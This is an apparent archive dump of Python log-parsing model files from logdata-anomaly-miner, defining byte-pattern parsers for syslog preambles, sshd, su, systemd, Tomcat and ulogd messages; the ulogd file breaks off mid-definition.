FixedDataModelElement("session_str", b"): authentication failure; logname="), OptionalMatchModelElement( "logname", DelimitedDataModelElement("logname", b" ") ), FixedDataModelElement("uid_str", b" uid="), DecimalIntegerValueModelElement("uid"), 
FixedDataModelElement("euid_str", b" euid="), DecimalIntegerValueModelElement("euid"), FixedDataModelElement("tty_str", b" tty="), DelimitedDataModelElement("tty", b" "), FixedDataModelElement("ruser_str", b" ruser="), DelimitedDataModelElement("ruser", b" "), FixedDataModelElement("rhost_str", b" rhost="), IpAddressDataModelElement("rhost"), OptionalMatchModelElement( "user", SequenceModelElement("user", [ FixedDataModelElement("user_str", b" user="), VariableByteDataModelElement("user", alphabet) ]) ) ]), SequenceModelElement("systemd", [ FixedDataModelElement("systemd_str", b" systemd["), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("brack_str1", b"]: "), AnyByteDataModelElement("msg")]), SequenceModelElement("systemd2", [ FixedDataModelElement("systemd_str", b" systemd: "), DelimitedDataModelElement("pam", b"("), FixedDataModelElement("brack_str", b"("), DelimitedDataModelElement("name", b")"), FixedDataModelElement("session_str", b"): session "), FixedWordlistDataModelElement("status", [b"opened", b"closed"]), FixedDataModelElement("user_str", b" for user "), VariableByteDataModelElement("user", alphabet), OptionalMatchModelElement( "uid", SequenceModelElement("uid", [ FixedDataModelElement("uid_str", b" by (uid="), DecimalIntegerValueModelElement("uid"), FixedDataModelElement("brack_str", b")") ]) ) ]), SequenceModelElement("systemd-modules-load", [ FixedDataModelElement("systemd_str", b" systemd-modules-load["), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("brack_str1", b"]: "), FixedDataModelElement("inserted", b"Inserted module '"), DelimitedDataModelElement("module", b"'"), FixedDataModelElement("apo", b"'") ]), SequenceModelElement("systemd-networkd-wait-online", [ FixedDataModelElement("systemd_str", b" systemd-networkd-wait-online["), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("brack_str1", b"]: "), FixedWordlistDataModelElement("inserted", [b"managing", b"ignoring"]), FixedDataModelElement("sp", b": 
"), AnyByteDataModelElement("interface") ]), SequenceModelElement("systemd-fsck", [ FixedDataModelElement("systemd_str", b" systemd-fsck["), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("brack_str1", b"]: "), AnyByteDataModelElement("msg")]), SequenceModelElement("systemd-udevd", [ FixedDataModelElement("systemd_str", b" systemd-udevd["), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("brack_str1", b"]: "), AnyByteDataModelElement("msg")]), SequenceModelElement("sshd", [ FixedDataModelElement("systemd_str", b" sshd["), DecimalIntegerValueModelElement("id"), FixedDataModelElement("brack_str2", b"]: "), FirstMatchModelElement("fm", [ SequenceModelElement("new", [ FixedDataModelElement("brack_str", b"pam_unix("), DelimitedDataModelElement("name", b")"), FirstMatchModelElement("message", [ SequenceModelElement("session", [ FixedDataModelElement("session_str", b"): session "), FixedWordlistDataModelElement("status", [b"opened", b"closed"]), FixedDataModelElement("user_str", b" for user "), VariableByteDataModelElement("user", alphabet), OptionalMatchModelElement( "uid", SequenceModelElement("uid", [ FixedDataModelElement("uid_str", b" by (uid="), DecimalIntegerValueModelElement("uid"), FixedDataModelElement("brack_str", b")") ]) ) ]), SequenceModelElement("session", [ FixedDataModelElement("changed_pw", b"): password changed for "), AnyByteDataModelElement("group") ]) ]) ]), SequenceModelElement("publickey", [ FixedDataModelElement("publickey_str", b"Accepted publickey for "), DelimitedDataModelElement("user", b" "), FixedDataModelElement("space", b" from "), IpAddressDataModelElement("ip"), FixedDataModelElement("space", b" port "), DecimalIntegerValueModelElement("port"), FixedDataModelElement("rsa", b" ssh2: RSA "), AnyByteDataModelElement("rsa"), ]), SequenceModelElement("ident", [ FixedDataModelElement("ident_str", b"Did not receive identification string from "), IpAddressDataModelElement("ip"), FixedDataModelElement("space", b" port 
"), DecimalIntegerValueModelElement("port"), ]), SequenceModelElement("listening", [ FixedDataModelElement("listening_str", b"Server listening on "), DelimitedDataModelElement("ip", b" "), FixedDataModelElement("port_str", b" port "), DecimalIntegerValueModelElement("port"), FixedDataModelElement("dot", b"."), ]), SequenceModelElement("signal", [ FixedDataModelElement("signal_str", b"Received signal"), AnyByteDataModelElement("remainder"), ]), SequenceModelElement("rec_disconnected", [ FixedDataModelElement("rec_disconnected_str", b"Received disconnect from "), IpAddressDataModelElement("ip"), FixedDataModelElement("space", b" port "), DecimalIntegerValueModelElement("port"), AnyByteDataModelElement("remainder"), ]), SequenceModelElement("disconnected", [ FixedDataModelElement("disconnected_str", b"Disconnected from user "), DelimitedDataModelElement("user", b" "), FixedDataModelElement("space", b" "), IpAddressDataModelElement("ip"), FixedDataModelElement("space", b" port "), DecimalIntegerValueModelElement("port"), ]), SequenceModelElement("disconnected", [ FixedDataModelElement("disconnected_str", b"Disconnected from "), OptionalMatchModelElement("user", SequenceModelElement("user", [ FixedDataModelElement("user_str", b"user "), DelimitedDataModelElement("user", b" "), FixedDataModelElement("space", b" "), ])), IpAddressDataModelElement("ip"), FixedDataModelElement("space", b" port "), DecimalIntegerValueModelElement("port"), ]), FixedDataModelElement("timeout", b"Timeout, client not responding.") ]) ]), SequenceModelElement("su", [ FixedDataModelElement("systemd_str", b" su["), DecimalIntegerValueModelElement("id"), FixedDataModelElement("brack_str2", b"]: "), FirstMatchModelElement("fm", [ SequenceModelElement("seq", [ FixedDataModelElement("brack_str", b"pam_unix("), DelimitedDataModelElement("name", b")"), FixedDataModelElement("session_str", b"): session "), FixedWordlistDataModelElement("status", [b"opened", b"closed"]), FixedDataModelElement("user_str", 
b" for user "), VariableByteDataModelElement("user", alphabet), OptionalMatchModelElement( "uid", SequenceModelElement("uid", [ FixedDataModelElement("uid_str", b" by (uid="), DecimalIntegerValueModelElement("uid"), FixedDataModelElement("brack_str", b")") ]) ), ]), SequenceModelElement("seq", [ FixedDataModelElement("brack_str", b"Successful su for "), VariableByteDataModelElement("user", alphabet), FixedDataModelElement("by_str", b" by "), VariableByteDataModelElement("su_user", alphabet), ]), SequenceModelElement("seq2", [ FixedDataModelElement("plus", b"+"), AnyByteDataModelElement("msg") ]), ]), ]), SequenceModelElement("kernel", [ FixedDataModelElement("kernel_str", b" kernel"), OptionalMatchModelElement( "id", SequenceModelElement("id", [ FixedDataModelElement("brack_str", b"["), DecimalIntegerValueModelElement("id"), FixedDataModelElement("brack_str2", b"]") ]) ), FixedDataModelElement("col_str", b": "), AnyByteDataModelElement("kernel_msg") ]), SequenceModelElement("augenrules", [ FixedDataModelElement("augenrules_str", b" augenrules["), DecimalIntegerValueModelElement("id"), FixedDataModelElement("brack_str1", b"]: "), AnyByteDataModelElement("augenrules_msg") ]), SequenceModelElement("auditd", [ FixedDataModelElement("auditd_str", b" auditd["), DecimalIntegerValueModelElement("id"), FixedDataModelElement("brack_str1", b"]: "), AnyByteDataModelElement("auditd_msg") ]), SequenceModelElement("auditd2", [ FixedDataModelElement("auditd2_str", b" auditd: "), AnyByteDataModelElement("auditd_msg") ]), SequenceModelElement("audispd", [ FixedDataModelElement("audispd_str", b" audispd: "), AnyByteDataModelElement("audispd_msg") ]), SequenceModelElement("liblogging", [ FixedDataModelElement("liblogging_str", b" liblogging-stdlog: "), AnyByteDataModelElement("liblogging_msg") ]), SequenceModelElement("os_prober", [ FixedDataModelElement("os_prober_str", b" os-prober: "), AnyByteDataModelElement("os_prober_msg") ]), SequenceModelElement("macosx_prober", [ 
FixedDataModelElement("macosx_prober_str", b" macosx-prober: "), AnyByteDataModelElement("macosx_prober_msg") ]), SequenceModelElement("haiku", [ FixedDataModelElement("haiku_str", b" 83haiku: "), AnyByteDataModelElement("haiku_msg") ]), SequenceModelElement("efi", [ FixedDataModelElement("efi_str", b" 05efi: "), AnyByteDataModelElement("efi_msg") ]), SequenceModelElement("freedos", [ FixedDataModelElement("freedos_str", b" 10freedos: "), AnyByteDataModelElement("freedos_msg") ]), SequenceModelElement("qnx", [ FixedDataModelElement("qnx_str", b" 10qnx: "), AnyByteDataModelElement("qnx_msg") ]), SequenceModelElement("microsoft", [ FixedDataModelElement("microsoft_str", b" 20microsoft: "), AnyByteDataModelElement("microsoft_msg") ]), SequenceModelElement("utility", [ FixedDataModelElement("utility_str", b" 30utility: "), AnyByteDataModelElement("utility_msg") ]), SequenceModelElement("mounted_tests", [ FixedDataModelElement("mounted_tests_str", b" 50mounted-tests: "), AnyByteDataModelElement("mounted_tests_msg") ]), SequenceModelElement("rsyslogd", [ FixedDataModelElement("rsyslogd_str", b" rsyslogd: "), AnyByteDataModelElement("rsyslogd_msg") ]), SequenceModelElement("timesyncd", [ FixedDataModelElement("timesyncd_str", b" systemd-timesyncd["), DecimalIntegerValueModelElement("id"), FixedDataModelElement("brack_str1", b"]: "), AnyByteDataModelElement("timesyncd_msg") ]), SequenceModelElement("logind", [ FixedDataModelElement("logind_str", b" systemd-logind["), DecimalIntegerValueModelElement("id"), FixedDataModelElement("brack_str1", b"]: "), FirstMatchModelElement("fm", [ SequenceModelElement("new", [ FixedDataModelElement("new_str", b"New session "), DelimitedDataModelElement("session", b" "), FixedDataModelElement("str", b" of user"), AnyByteDataModelElement("user"), ]), SequenceModelElement("removed", [ FixedDataModelElement("removed_str", b"Removed session "), DecimalIntegerValueModelElement("session"), FixedDataModelElement("dot", b"."), ]), 
SequenceModelElement("system_buttons", [ FixedDataModelElement("watching", b"Watching system buttons on /dev/input/event"), AnyByteDataModelElement("event_type") ]), FixedDataModelElement("new_seat", b"New seat seat0.") ])]), SequenceModelElement("grub", [ FixedDataModelElement("grub_str", b" grub-common["), DecimalIntegerValueModelElement("id"), FixedDataModelElement("brack_str1", b"]:"), AnyByteDataModelElement("grub_msg") ]), SequenceModelElement("polkitd", [ FixedDataModelElement("polkitd_str", b" polkitd["), DecimalIntegerValueModelElement("id"), FixedDataModelElement("brack_str1", b"]:"), AnyByteDataModelElement("polkitd_msg") ]), SequenceModelElement("dbus", [ FixedDataModelElement("dbus_str", b" dbus-daemon["), DecimalIntegerValueModelElement("id"), FixedDataModelElement("brack_str1", b"]:"), AnyByteDataModelElement("dbus_msg") ]), SequenceModelElement("hostnamed", [ FixedDataModelElement("hostnamed_str", b" systemd-hostnamed["), DecimalIntegerValueModelElement("id"), FixedDataModelElement("brack_str1", b"]:"), AnyByteDataModelElement("hostnamed_msg") ]), SequenceModelElement("apport", [ FixedDataModelElement("apport_str", b" apport["), DecimalIntegerValueModelElement("id"), FixedDataModelElement("brack_str1", b"]:"), AnyByteDataModelElement("apport_msg") ]), SequenceModelElement("resolved", [ FixedDataModelElement("resolved_str", b" systemd-resolved["), DecimalIntegerValueModelElement("id"), FixedDataModelElement("brack_str1", b"]: "), AnyByteDataModelElement("resolved_msg") ]), SequenceModelElement("networkd", [ FixedDataModelElement("networkd_str", b" systemd-networkd["), DecimalIntegerValueModelElement("id"), FixedDataModelElement("brack_str1", b"]: "), AnyByteDataModelElement("networkd_msg") ]), SequenceModelElement("networkd-dispatcher", [ FixedDataModelElement("networkd_str", b" networkd-dispatcher["), DecimalIntegerValueModelElement("id"), FixedDataModelElement("brack_str1", b"]: "), FixedDataModelElement("no_valid_path", b"No valid path found for 
"), AnyByteDataModelElement("interface") ]), SequenceModelElement("motd", [ FixedDataModelElement("motd_str", b" 50-motd-news["), DecimalIntegerValueModelElement("id"), FixedDataModelElement("brack_str1", b"]: "), AnyByteDataModelElement("motd_msg") ]), SequenceModelElement("freshclam", [ FixedDataModelElement("freshclam_str", b" freshclam["), DecimalIntegerValueModelElement("id"), FixedDataModelElement("brack_str1", b"]: "), AnyByteDataModelElement("freshclam_msg") ]), SequenceModelElement("dhclient", [ FixedDataModelElement("dhclient_str", b" dhclient["), DecimalIntegerValueModelElement("id"), FixedDataModelElement("brack_str1", b"]: "), OptionalMatchModelElement("opt", FirstMatchModelElement("dhclient", [ SequenceModelElement("dhcprequest", [ FixedDataModelElement("dhcprequest_str", b"DHCPREQUEST of "), IpAddressDataModelElement("src_ip"), FixedDataModelElement("on_str", b" on "), DelimitedDataModelElement("network_interface", b" "), FixedDataModelElement("to_str", b" to "), IpAddressDataModelElement("dst_ip"), FixedDataModelElement("port_str", b" port "), DecimalIntegerValueModelElement("port"), OptionalMatchModelElement("xid", SequenceModelElement("xid", [ FixedDataModelElement("xid", b" (xid=0x"), HexStringModelElement("hex"), FixedDataModelElement("bracket", b")") ])) ]), SequenceModelElement("dhcpack", [ FixedDataModelElement("dhcpack_str", b"DHCPACK of "), IpAddressDataModelElement("dst_ip"), FixedDataModelElement("on_str", b" from "), IpAddressDataModelElement("src_ip") ]), SequenceModelElement("bound", [ FixedDataModelElement("bound_str", b"bound to "), IpAddressDataModelElement("ip"), FixedDataModelElement("renewal_str", b" -- renewal in "), DecimalIntegerValueModelElement("seconds"), FixedDataModelElement("seconds_str", b" seconds.") ]), AnyByteDataModelElement("skipped_msg") ])), ]), SequenceModelElement("apparmor", [ FixedDataModelElement("apparmor_str", b" apparmor["), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("brack_str1", b"]: 
"), AnyByteDataModelElement("msg")]), SequenceModelElement("snapd-apparmor", [ FixedDataModelElement("snapd-apparmor_str", b" snapd-apparmor["), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("brack_str1", b"]: "), AnyByteDataModelElement("msg")]), SequenceModelElement("snapd", [ FixedDataModelElement("snapd_str", b" snapd["), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("brack_str1", b"]: "), AnyByteDataModelElement("msg")]), SequenceModelElement("cloud-init", [ FixedDataModelElement("cloud-init_str", b" cloud-init"), OptionalMatchModelElement("pid", SequenceModelElement("pid", [ FixedDataModelElement("open_bracket", b"["), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("close_bracket", b"]"), ])), FixedDataModelElement("colon", b": "), AnyByteDataModelElement("msg")]), SequenceModelElement("irqbalance", [ FixedDataModelElement("irqbalance_str", b" /usr/sbin/irqbalance"), AnyByteDataModelElement("msg")]), SequenceModelElement("pollinate", [ FixedDataModelElement("pollinate_str", b" pollinate["), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("brack_str1", b"]: "), AnyByteDataModelElement("msg")]), SequenceModelElement("lxcfs", [ FixedDataModelElement("lxcfs_str", b" lxcfs["), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("brack_str1", b"]: "), AnyByteDataModelElement("msg")]), SequenceModelElement("accounts-daemon", [ FixedDataModelElement("accounts-daemon_str", b" accounts-daemon["), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("brack_str1", b"]: "), AnyByteDataModelElement("msg")]), SequenceModelElement("ec2", [ FixedDataModelElement("ec2_str", b" ec2: "), OptionalMatchModelElement("opt", AnyByteDataModelElement("msg"))]), SequenceModelElement("dnsmasq", [ FixedDataModelElement("dnsmasq_str", b" dnsmasq["), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("brack_str1", b"]: "), AnyByteDataModelElement("msg")]), SequenceModelElement("etc_maradns_mararc", [ 
FixedDataModelElement("etc_maradns_mararc_str", b" etc_maradns_mararc["), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("brack_str1", b"]: "), OptionalMatchModelElement("opt", AnyByteDataModelElement("msg"))]), SequenceModelElement("etc_maradns_mararc-zs", [ FixedDataModelElement("etc_maradns_mararc-zs_str", b" etc_maradns_mararc-zs["), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("brack_str1", b"]: "), OptionalMatchModelElement("opt", AnyByteDataModelElement("msg"))]), SequenceModelElement("ifup", [ FixedDataModelElement("ifup_str", b" ifup["), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("brack_str1", b"]: "), AnyByteDataModelElement("msg")]), SequenceModelElement("root", [ FixedDataModelElement("root_str", b" root: "), AnyByteDataModelElement("msg")]), SequenceModelElement("ntpd", [ FixedDataModelElement("ntpd_str", b" ntpd["), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("brack_str1", b"]: "), AnyByteDataModelElement("msg")]), SequenceModelElement("ntp", [ FixedDataModelElement("ntp_str", b" ntp["), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("brack_str1", b"]: "), AnyByteDataModelElement("msg")]), SequenceModelElement("exim4", [ FixedDataModelElement("exim4_str", b" exim4"), OptionalMatchModelElement("opt", SequenceModelElement("pid", [ FixedDataModelElement("open_bracket", b"["), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("close_bracket", b"]"), ])), FixedDataModelElement("colon_str1", b": "), AnyByteDataModelElement("msg")]), SequenceModelElement("mysqld_safe", [ FixedDataModelElement("mysqld_safe_str", b" mysqld_safe["), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("brack_str1", b"]: "), AnyByteDataModelElement("msg")]), SequenceModelElement("mysqld", [ FixedDataModelElement("mysqld_str", b" mysqld["), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("brack_str1", b"]: "), AnyByteDataModelElement("msg")]), 
SequenceModelElement("php7.0", [ FixedDataModelElement("php7.0_str", b" php7.0-"), DelimitedDataModelElement("service", b":"), FixedDataModelElement("colon", b": "), AnyByteDataModelElement("msg")]), SequenceModelElement("libapache2-mod-php7.0", [ FixedDataModelElement("libapache2-mod-php7.0_str", b" libapache2-mod-php7.0: "), AnyByteDataModelElement("msg")]), SequenceModelElement("php", [ FixedDataModelElement("php_str", b" php-"), DelimitedDataModelElement("service", b":"), FixedDataModelElement("colon", b": "), AnyByteDataModelElement("msg")]), SequenceModelElement("apache2_postinst", [ FixedDataModelElement("apache2_postinst_str", b" apache2.postinst: "), AnyByteDataModelElement("msg")]), SequenceModelElement("smbd", [ FixedDataModelElement("smbd_str", b" smbd["), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("brack_str1", b"]: "), AnyByteDataModelElement("msg")]), SequenceModelElement("ut", [ FixedDataModelElement("ut_str", b" ut["), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("brack_str1", b"]: "), AnyByteDataModelElement("msg")]), SequenceModelElement("apachectl", [ FixedDataModelElement("apachectl_str", b" apachectl["), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("brack_str1", b"]: "), FirstMatchModelElement("fm", [ SequenceModelElement("ah00548", [ FixedDataModelElement("ah00548", b"AH00548: NameVirtualHost has no effect and will be removed in the next release "), AnyByteDataModelElement("cfg_path") ]) ]) ]) ]) ]) return model logdata-anomaly-miner-2.8.0/source/root/etc/aminer/conf-available/generic/SyslogPreambleModel.py000066400000000000000000000023461500476301700327650ustar00rootroot00000000000000"""This module defines a parser for syslog.""" from aminer.parsing.DateTimeModelElement import DateTimeModelElement from aminer.parsing.FixedDataModelElement import FixedDataModelElement from aminer.parsing.SequenceModelElement import SequenceModelElement from aminer.parsing.VariableByteDataModelElement import 
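from aminer.parsing.VariableByteDataModelElement import VariableByteDataModelElement


def get_model(time_model=None):
    """Return the model for parsing a standard syslog preamble including timestamp and hostname.

    @param time_model when not None, the given model element is used for parsing timestamps. Otherwise a standard
    DateTimeModelElement with format b"%b %d %H:%M:%S" is created.
    @return a SequenceModelElement named "syslog" consisting of the timestamp, a space, the host name and a space.

    CAVEAT: the standard model may not work when the log data timestamp locale does not match the host or shell
    environment locale. See MultiLocaleDateTimeModelElement instead.
    """
    if time_model is None:
        # The format carries no year field, so start_year seeds the year; how the element rolls the year
        # over afterwards is not visible here - confirm before parsing multi-year archives.
        time_model = DateTimeModelElement("time", b"%b %d %H:%M:%S", start_year=2020)
    # Only lowercase letters, digits, '-' and '.' are accepted for the host name. A preamble whose host
    # name contains any other byte (e.g. an uppercase letter) does not match this model at all.
    host_name_model = VariableByteDataModelElement("host", b"-.01234567890abcdefghijklmnopqrstuvwxyz")
    model = SequenceModelElement("syslog", [
        time_model,
        FixedDataModelElement("sp0", b" "),
        host_name_model,
        FixedDataModelElement("sp1", b" ")
    ])
    return model


# ==== logdata-anomaly-miner-2.8.0/source/root/etc/aminer/conf-available/generic/SystemdParsingModel.py ====
"""This module contains functions and classes to create the parsing model."""
from aminer.parsing.DecimalFloatValueModelElement import DecimalFloatValueModelElement
from aminer.parsing.DecimalIntegerValueModelElement import DecimalIntegerValueModelElement
from aminer.parsing.DelimitedDataModelElement import DelimitedDataModelElement
from aminer.parsing.FirstMatchModelElement import FirstMatchModelElement
from aminer.parsing.FixedDataModelElement import FixedDataModelElement
from aminer.parsing.OptionalMatchModelElement import OptionalMatchModelElement
from aminer.parsing.SequenceModelElement import SequenceModelElement
from aminer.parsing.VariableByteDataModelElement import VariableByteDataModelElement


def get_model():
    """Return the combined model: a FirstMatchModelElement over the systemd, logind and tmpfiles models, tried in that order."""
    model = FirstMatchModelElement("systemd-fm", [
        get_systemd_model(),
        get_logind_model(),
        get_tmp_files_model()
    ])
    return model


def get_systemd_model():
    """Return the parsing model for messages directly from systemd.

    @return a SequenceModelElement "systemd" matching b"systemd[<pid>]: " followed by the first matching message type.
    """
    type_children = [
        FixedDataModelElement("apt-daily-start", b"Starting Daily apt upgrade and clean activities..."),
        FixedDataModelElement("apt-daily-started", b"Started Daily apt upgrade and clean activities."),
        FixedDataModelElement("apt-daily-finished", b"Finished Daily apt upgrade and clean activities."),
        SequenceModelElement("service-succeeded", [
            DelimitedDataModelElement("service", b" "),
            FixedDataModelElement("s0", b" Succeeded.")
        ]),
        FixedDataModelElement("clean-php", b"Finished Clean php session files."),
        FixedDataModelElement("finished-logrotate", b"Finished Rotate log files."),
        FixedDataModelElement("finished-man-db-daily", b"Finished Daily man-db regeneration."),
        FixedDataModelElement("finished-ubuntu-advantages", b"Finished Ubuntu Advantage APT and MOTD Messages."),
        FixedDataModelElement("finished-refresh", b"Finished Refresh fwupd metadata and update motd."),
        FixedDataModelElement("finished-daily-apt", b"Finished Daily apt download activities."),
        SequenceModelElement("apt-daily-timer", [
            FixedDataModelElement("s0", b"apt-daily.timer: Adding "),
            # The hour part is only present for random delays of one hour or more.
            OptionalMatchModelElement("hopt", SequenceModelElement("hblock", [
                DecimalIntegerValueModelElement("hours"),
                FixedDataModelElement("s1", b"h ")
            ])),
            DecimalIntegerValueModelElement("minutes"),
            FixedDataModelElement("s2", b"min "),
            DecimalFloatValueModelElement("seconds"),
            FixedDataModelElement("s3", b"s random time.")
        ]),
        FixedDataModelElement("tmp-file-cleanup", b"Starting Cleanup of Temporary Directories..."),
        FixedDataModelElement("tmp-file-cleanup-started", b"Started Cleanup of Temporary Directories."),
        # Only the update-notifier kill message is modelled; the process name is part of the fixed suffix.
        SequenceModelElement("killing-process", [
            DelimitedDataModelElement("service", b":"),
            FixedDataModelElement("s0", b": Killing process "),
            DecimalIntegerValueModelElement("pid"),
            FixedDataModelElement("s1", b" (update-notifier) with signal SIGKILL.")
        ]),
        # "service" stops at the first '.', so a description that itself contains a dot before the
        # trailing "..." does not match this branch.
        SequenceModelElement("starting", [
            FixedDataModelElement("s0", b"Starting "),
            DelimitedDataModelElement("service", b"."),
            FixedDataModelElement("s1", b"...")
        ]),
        SequenceModelElement("started", [
            FixedDataModelElement("s0", b"Started "),
            DelimitedDataModelElement("service", b".", consume_delimiter=True)
        ]),
        FixedDataModelElement("reloading", b"Reloading.")
    ]
    model = SequenceModelElement("systemd", [
        FixedDataModelElement("sname", b"systemd["),
        DecimalIntegerValueModelElement("pid"),
        FixedDataModelElement("s0", b"]: "),
        FirstMatchModelElement("msg", type_children)
    ])
    return model


def get_logind_model(user_name_model=None):
    """Return a model to parse a systemd logind daemon message after any standard logging preamble, e.g. from syslog.

    @param user_name_model optional element used for the user name in "New session" messages. When None, a
    VariableByteDataModelElement accepting lowercase letters, digits, '-' and '_' is used.
    @return a SequenceModelElement "systemd-logind" matching b"systemd-logind[<pid>]: " followed by the message.
    """
    if user_name_model is None:
        user_name_model = VariableByteDataModelElement("user", b"0123456789abcdefghijklmnopqrstuvwxyz-_")
    type_children = [
        SequenceModelElement("new session", [
            FixedDataModelElement("s0", b"New session "),
            DecimalIntegerValueModelElement("session"),
            FixedDataModelElement("s1", b" of user "),
            user_name_model,
            FixedDataModelElement("s2", b".")
        ]),
        SequenceModelElement("removed session", [
            FixedDataModelElement("s0", b"Removed session "),
            DecimalIntegerValueModelElement("session"),
            FixedDataModelElement("s1", b".")
        ]),
        SequenceModelElement("logged out", [
            FixedDataModelElement("s0", b"Session "),
            DecimalIntegerValueModelElement("session"),
            FixedDataModelElement("s1", b" logged out. Waiting for processes to exit.")
        ]),
        FixedDataModelElement("failed abandon", b"Failed to abandon session scope: Transport endpoint is not connected")
    ]
    # A caller-supplied user_name_model whose alphabet includes '.' would consume the trailing '.' that
    # "s2" expects, so the "new session" branch would then fail to match.
    model = SequenceModelElement("systemd-logind", [
        FixedDataModelElement("sname", b"systemd-logind["),
        DecimalIntegerValueModelElement("pid"),
        FixedDataModelElement("s0", b"]: "),
        FirstMatchModelElement("msg", type_children)
    ])
    return model


def get_tmp_files_model():
    """Return a model to parse a systemd tmpfiles daemon message after any standard logging preamble, e.g. from syslog.

    @return a SequenceModelElement "systemd-tmpfiles" matching b"systemd-tmpfiles[<pid>]: " followed by the message.
    """
    # Only the "Duplicate line" warning for /usr/lib/tmpfiles.d/var.conf line 14 is modelled; the config
    # file and line number are part of the fixed prefix, so the same warning for another file or line
    # does not match.
    type_children = [
        SequenceModelElement("duplicate", [
            FixedDataModelElement("s0", b'[/usr/lib/tmpfiles.d/var.conf:14] Duplicate line for path "'),
            DelimitedDataModelElement("path", b'", ignoring.'),
            FixedDataModelElement("s2", b'", ignoring.')
        ])
    ]
    model = SequenceModelElement("systemd-tmpfiles", [
        FixedDataModelElement("sname", b"systemd-tmpfiles["),
        DecimalIntegerValueModelElement("pid"),
        FixedDataModelElement("s0", b"]: "),
        FirstMatchModelElement("msg", type_children)
    ])
    return model


# ==== logdata-anomaly-miner-2.8.0/source/root/etc/aminer/conf-available/generic/TomcatParsingModel.py ====
"""This module defines a parser for tomcat."""
from aminer.parsing.AnyByteDataModelElement import AnyByteDataModelElement
from aminer.parsing.DecimalIntegerValueModelElement import DecimalIntegerValueModelElement
from aminer.parsing.FirstMatchModelElement import FirstMatchModelElement
from aminer.parsing.FixedDataModelElement import FixedDataModelElement
from aminer.parsing.SequenceModelElement import SequenceModelElement


def get_model():
    """Return the model for tomcat7 init-script messages.

    @return a SequenceModelElement "tomcat7" matching b"tomcat7[<pid>]: " followed by the message.
    """
    type_children = [
        FixedDataModelElement("start", b" * Starting Tomcat servlet engine tomcat7"),
        FixedDataModelElement("stop", b" * Stopping Tomcat servlet engine tomcat7"),
        FixedDataModelElement("done", b" ...done."),
        # Catch-all: any other message after the "tomcat7[<pid>]: " prefix is accepted as one opaque
        # value instead of being reported as unparsed, so nothing in it is exposed to detectors as fields.
        AnyByteDataModelElement("unparsed")
    ]
    model = SequenceModelElement("tomcat7", [
        FixedDataModelElement("sname", b"tomcat7["),
        DecimalIntegerValueModelElement("pid"),
        FixedDataModelElement("s0", b"]: "),
        FirstMatchModelElement("msg", type_children)
    ])
    return model


# ==== logdata-anomaly-miner-2.8.0/source/root/etc/aminer/conf-available/generic/UlogdParsingModel.py ====
"""This module defines the parser for ulogd messages."""
from aminer.parsing.DecimalIntegerValueModelElement import DecimalIntegerValueModelElement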
DecimalIntegerValueModelElement from aminer.parsing.DelimitedDataModelElement import DelimitedDataModelElement from aminer.parsing.FirstMatchModelElement import FirstMatchModelElement from aminer.parsing.FixedDataModelElement import FixedDataModelElement from aminer.parsing.FixedWordlistDataModelElement import FixedWordlistDataModelElement from aminer.parsing.IpAddressDataModelElement import IpAddressDataModelElement from aminer.parsing.OptionalMatchModelElement import OptionalMatchModelElement from aminer.parsing.SequenceModelElement import SequenceModelElement def get_model(): """Return a model for su session information messages after any standard logging preamble, e.g. from syslog.""" type_children = [ SequenceModelElement("build-stack", [ FixedDataModelElement("s0", b"building new pluginstance stack: \""), DelimitedDataModelElement("stack", b"\""), FixedDataModelElement("s1", b"\"") ]), SequenceModelElement("nfct-event", [ FixedDataModelElement("s0", b"[DESTROY] ORIG: SRC="), IpAddressDataModelElement("osrcip"), FixedDataModelElement("s1", b" DST="), IpAddressDataModelElement("odstip"), FixedDataModelElement("s2", b" PROTO="), FixedWordlistDataModelElement("proto", [b"TCP", b"UDP"]), FixedDataModelElement("s3", b" SPT="), DecimalIntegerValueModelElement("ospt"), FixedDataModelElement("s4", b" DPT="), DecimalIntegerValueModelElement("odpt"), FixedDataModelElement("s5", b" PKTS="), DecimalIntegerValueModelElement("opkts"), FixedDataModelElement("s6", b" BYTES="), DecimalIntegerValueModelElement("obytes"), FixedDataModelElement("s7", b" , REPLY: SRC="), IpAddressDataModelElement("rsrcip"), FixedDataModelElement("s8", b" DST="), IpAddressDataModelElement("rdstip"), FixedDataModelElement("s9", b" PROTO="), FixedWordlistDataModelElement("rproto", [b"TCP", b"UDP"]), FixedDataModelElement("s10", b" SPT="), DecimalIntegerValueModelElement("rspt"), FixedDataModelElement("s11", b" DPT="), DecimalIntegerValueModelElement("rdpt"), FixedDataModelElement("s12", b" PKTS="), 
